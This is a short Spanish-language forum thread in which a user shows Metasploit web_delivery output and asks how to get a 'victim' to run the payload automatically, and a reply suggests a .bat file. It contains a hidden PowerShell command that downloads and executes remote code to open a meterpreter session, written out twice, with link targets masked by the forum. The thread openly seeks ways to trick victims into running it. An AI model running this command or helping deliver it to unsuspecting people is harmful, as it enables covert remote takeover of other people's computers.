Web_delivery

Iniciado por RxB, Octubre 17, 2015, 05:34:01 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 17, 2015, 05:34:01 PM Ultima modificación: Octubre 22, 2015, 05:19:36 PM por Expermicid
Hola,

Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit
  • Exploit running as background job.

  • Started HTTP reverse handler on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    msf exploit(web_delivery) >
  • Using URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Local IP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Server started.
  • Run the following command on the target machine:
    powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))

    Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:

    powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))

    Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.

    Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?

    Si alguien tiene alguna idea se lo agradezco!

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, efectivamente la unica forma que puede funcionarte es con un .bat
Dudo que haya otra forma de hacerlo.

Saludos!
ANTRAX